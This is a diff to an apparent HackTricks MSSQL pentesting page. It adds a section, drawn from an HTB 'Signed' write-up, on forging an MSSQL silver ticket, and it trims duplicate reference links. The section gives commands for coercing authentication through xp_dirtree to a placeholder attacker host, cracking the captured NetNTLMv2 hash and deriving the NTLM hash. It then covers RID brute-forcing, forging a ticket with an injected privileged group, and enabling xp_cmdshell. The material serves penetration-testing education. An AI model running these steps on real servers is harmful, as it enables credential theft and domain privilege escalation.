HTB Signed

src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md

@@ -384,6 +384,27 @@ You can see how to use these tools in:
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
+#### From NetNTLMv2 capture to MSSQL silver ticket (PAC group injection)
+- Capture the SQL Server service account NetNTLMv2 via `xp_dirtree '\\\\<attacker_ip>\\share'` with Responder (Hashcat mode 5600 to crack).
+- Derive the service NTLM hash from the recovered password:
+
+```python
+python3 - <<'PY'
+import hashlib
+print(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).hexdigest())
+PY
+```
+
+- Get the domain SID bytes with `SELECT SUSER_SID('DOMAIN\\Domain Users');` (RID = last 4 bytes, little endian). Map/brute RIDs with `nxc mssql ... --rid-brute` to find a group granting sysadmin (e.g., RID `1105`).
+- Forge a silver ticket for the MSSQL SPN with the privileged group RID injected in the PAC:
+
+```bash
+ticketer.py -nthash <SERVICE_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn MSSQLSvc/<fqdn>:1433 -groups <GROUP_RID> <user_to_impersonate>
+KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
+```
+
+- Enable `xp_cmdshell` if needed; commands run as the SQL Server service account even when impersonating via the forged ticket.
+
 ### Abusing MSSQL trusted Links
 
 [**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:**
@@ -710,6 +731,7 @@ You probably will be able to **escalate to Administrator** following one of thes
 ## References
 
 - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
+- [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
@@ -721,16 +743,6 @@ You probably will be able to **escalate to Administrator** following one of thes
 - [https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
 
 
-- [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
-- [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
-- [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
-- [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
-- [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
-- [https://exploit7-tr.translate.goog/posts/sqlserver/?\_x_tr_sl=es&\_x_tr_tl=en&\_x_tr_hl=en&\_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
-
 ## HackTricks Automatic Commands
 
 ```